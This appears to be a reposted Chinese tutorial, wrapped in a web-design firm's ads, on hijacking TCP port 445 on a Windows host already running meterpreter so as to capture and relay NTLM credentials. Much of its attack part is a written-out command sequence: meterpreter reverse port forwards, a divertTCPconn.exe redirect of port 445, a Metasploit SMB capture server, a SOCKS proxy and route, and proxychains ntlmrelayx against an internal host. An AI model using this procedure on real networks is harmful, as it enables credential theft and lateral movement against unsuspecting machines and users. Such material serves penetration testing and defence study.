如何理解Meterpreter在Windows445端口實(shí)施遠(yuǎn)程N(yùn)TLM中繼攻擊測試

今天就跟大家聊聊有關(guān)如何理解Meterpreter在Windows 445端口實(shí)施遠(yuǎn)程N(yùn)TLM中繼攻擊測試，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

為濱城等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計(jì)制作服務(wù)，及濱城網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務(wù)為網(wǎng)站制作、網(wǎng)站建設(shè)、濱城網(wǎng)站設(shè)計(jì)，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務(wù)。我們深信只要達(dá)到每一位用戶的要求，就會(huì)得到認(rèn)可，從而選擇與我們長期合作。這樣，我們也可以走得更遠(yuǎn)！

劫持445端口來執(zhí)行中繼攻擊或Hash-Capturing攻擊已經(jīng)是一種經(jīng)常會(huì)出現(xiàn)的攻擊方式了，當(dāng)你使用meterpreter感染目標(biāo)設(shè)備時(shí)，你如何監(jiān)聽445端口呢？就在幾周之前，這個(gè)話題再次浮出了水面。但實(shí)際上，現(xiàn)有的工具早就已經(jīng)解決了這個(gè)問題了，只不過很少有人知道罷了…

我們將介紹如何利用這些工具來對(duì)目標(biāo)設(shè)備執(zhí)行中繼攻擊。這種技術(shù)的好處就在于，我們不需要在受感染的主機(jī)上使用python2exe或整個(gè)Python棧，我們只需要使用簡單的驅(qū)動(dòng)器和meterpreter就可以實(shí)現(xiàn)目標(biāo)。

請(qǐng)注意，為了方便演示，我們這里把所有的文件都放在了目標(biāo)主機(jī)的磁盤中，如果你在實(shí)際操作中不想這樣的話，你可以使用RAM磁盤解決方案或擴(kuò)展當(dāng)前的meterpreter內(nèi)存執(zhí)行功能來實(shí)現(xiàn)自己的目標(biāo)。除此之外，你還可以采用靜態(tài)編譯等方法來捆綁額外的DLL文件。

端口445的“主人”是誰？

首先，我們需要知道主機(jī)中哪一個(gè)服務(wù)或進(jìn)程負(fù)責(zé)監(jiān)聽端口445。一般來說，在解決這種類型的問題時(shí)我喜歡先上網(wǎng)搜索一番，如果有人已經(jīng)回答過這些問題的話，我們就可以直接在系統(tǒng)上手動(dòng)驗(yàn)證并復(fù)制解決方案了。所以我直接Google了以下內(nèi)容：

msdnprocess listening port 445

我進(jìn)行了一系列測試，并通過啟用和禁用服務(wù)來判斷該服務(wù)是否負(fù)責(zé)監(jiān)聽445端口，結(jié)果我就發(fā)現(xiàn)了Server服務(wù)。但是這個(gè)服務(wù)并不會(huì)給我們帶來立竿見影的效果，因?yàn)樗枰貑⒃O(shè)備才能完成我們的操作，顯然這不是真正可行的解決方案。因?yàn)槔硐肭闆r下，我們并不想重啟受感染的設(shè)備。

深入分析并查看該服務(wù)的相關(guān)屬性之后，我們就可以找到啟用該服務(wù)的命令：

C:\WINDOWS\system32\svchost.exe-k netsvcs -p

如果你想深入了解svchost.exe的命令行參數(shù)，我建議你訪問Geoff Chappell的網(wǎng)站：【傳送門】

如果我們導(dǎo)航到文章上述所介紹的注冊(cè)表鍵：

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost

我們將看到大量的捆綁服務(wù)，但這也并沒有完全解決我們的問題，所以我們需要另辟蹊徑。這里我找到了一篇關(guān)于EternalBlue漏洞利用的文章，這里面提到了漏洞利用分析和Windows 10端口的相關(guān)內(nèi)容：srv.sys驅(qū)動(dòng)器和某些需要與該驅(qū)動(dòng)器協(xié)同工作的驅(qū)動(dòng)器都會(huì)涉及到SMB協(xié)議。最后，為了得到最終的確認(rèn)，我們還找到了這篇文章：【    傳送門】

現(xiàn)在，我們了解到了負(fù)責(zé)處理程序與端口445通信的代碼位于內(nèi)核中，這對(duì)于我們來說絕對(duì)是一個(gè)壞消息，因?yàn)榻俪謘ocket的難度非常大。接下來，我們會(huì)介紹如何劫持和重定向端口445。

端口445的劫持與重定向

既然我們已經(jīng)知道了端口445的“主人”存在于內(nèi)核中，我們就可以開始設(shè)計(jì)我們的攻擊策略了。首先，我想到的就是使用Linux的iptables來劫持傳入或傳出的連接數(shù)據(jù)，因?yàn)樗龅墓ぷ鲗儆诘氖蔷W(wǎng)絡(luò)棧中的底層部分。為了弄清楚這種方法能否應(yīng)用到Windows中，我們需要看一看Windows防火墻的內(nèi)部工作原理：

1、 Windows防火墻架構(gòu)：【傳送門】

2、 Windows過濾器平臺(tái)概覽：【傳送門】

這里我們需要?jiǎng)?chuàng)建一個(gè)專門的驅(qū)動(dòng)程序，你可能會(huì)認(rèn)為netsh端口重定向技術(shù)可能會(huì)有用，但其實(shí)不然。雖然創(chuàng)建一個(gè)驅(qū)動(dòng)程序聽起來似乎并不是最理想的解決方案，但如果你搜索類似wfp端口連接之類的相關(guān)內(nèi)容，你就會(huì)發(fā)現(xiàn)答案@agsolino已經(jīng)給出了，接下來我們一起看一看如何利用meterpreter和上述技術(shù)來重定向目標(biāo)系統(tǒng)端口445的連接。下圖顯示的是整個(gè)技術(shù)的工作機(jī)制：

   

我們可以看到，我們已經(jīng)得到了一臺(tái)感染了meterpreter的主機(jī)，利用這個(gè)meterpreter，我們可以設(shè)置一個(gè)反向端口轉(zhuǎn)發(fā)，然后在我們的主機(jī)上通過端口4444來接收meterpreter連接。遠(yuǎn)程監(jiān)聽端口8445（meterpreter）將接收來自端口445的連接數(shù)據(jù)，從而劫持來自445的連接，并將它們轉(zhuǎn)發(fā)到metasploit。接下來，我們通過劫持某些憑證來看看如何劫持Windows 445端口：

1.   設(shè)置一個(gè)可用的擁有管理員權(quán)限的meterpreter會(huì)話；

2.   設(shè)置一個(gè)SMB捕捉服務(wù)器：

a)     使用auxiliary/scanner/smb/smb_login

b)    設(shè)置SRVPORT 9445

c)     運(yùn)行-j

3.   設(shè)置一個(gè)meterpreter反向轉(zhuǎn)發(fā)端口：

portfwdadd -R -L 127.0.0.1 -l 9445 -p 8445

4.   設(shè)置端口445劫持：

divert TCPConn.exe 445 8445

現(xiàn)在，當(dāng)目標(biāo)主機(jī)連接到受感染主機(jī)的445端口之后，你將會(huì)在你的metasploit控制臺(tái)中接收到哈希：

   

接下來，我們一起看一看遠(yuǎn)程N(yùn)TLM中繼攻擊的完整實(shí)現(xiàn)機(jī)制。

如何通過meterpreter實(shí)現(xiàn)SMB中繼攻擊

現(xiàn)在，我們將在Ubuntu系統(tǒng)中使用ntlmrelayx，中繼設(shè)備為目標(biāo)系統(tǒng)中的某個(gè)系統(tǒng)。這里涉及到通過meterpreter來轉(zhuǎn)發(fā)正向和反向流量，反向連接用于確保目標(biāo)網(wǎng)絡(luò)內(nèi)的主機(jī)能夠跟受感染主機(jī)完成連接，這里需要用到ntlmrelayx，與目標(biāo)網(wǎng)絡(luò)的連接需要涉及到SOCKS代理。下圖顯示的是整個(gè)攻擊流程：

   

第一步跟之前的圖片類似，這里將設(shè)置我們的反向信道：

1.   設(shè)置一個(gè)可用的擁有管理員權(quán)限的meterpreter會(huì)話

2.   設(shè)置一個(gè)meterpreter反向端口轉(zhuǎn)發(fā)：

portfwd add -R -p 4445 -l 445 -L 127.0.0.1

3.   通過meterpreter進(jìn)行端口445劫持：

execute-f divertTCPconn.exe -a '445 4445'

為了設(shè)置轉(zhuǎn)發(fā)信道，我們通過meterpreter會(huì)話聽加了一個(gè)路由來重定向流量，并設(shè)置SOCKS代理：

1.   通過meterpreter添加路由，這里需要指定IP地址：

route add 192.168.222.103/32 3

2.   設(shè)置SOCKS代理：

a)     使用auxiliary/server/socks4a

b)    run

c)     確保/etc/proxychains.conf中指定了SOCKS端口（默認(rèn)1080）

3.   通過SOCK運(yùn)行ntlmrelayx：

sudo proxychains ntlmrelayx.py -t smb://192.168.222.103 -smb2support

下圖為運(yùn)行結(jié)果：

看完上述內(nèi)容，你們對(duì)如何理解Meterpreter在Windows 445端口實(shí)施遠(yuǎn)程N(yùn)TLM中繼攻擊測試有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝大家的支持。

本文名稱：如何理解Meterpreter在Windows445端口實(shí)施遠(yuǎn)程N(yùn)TLM中繼攻擊測試
本文路徑：http://muchs.cn/article42/ippdec.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供App設(shè)計(jì)、網(wǎng)站改版、全網(wǎng)營銷推廣、網(wǎng)站收錄、外貿(mào)網(wǎng)站建設(shè)、微信公眾號(hào)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)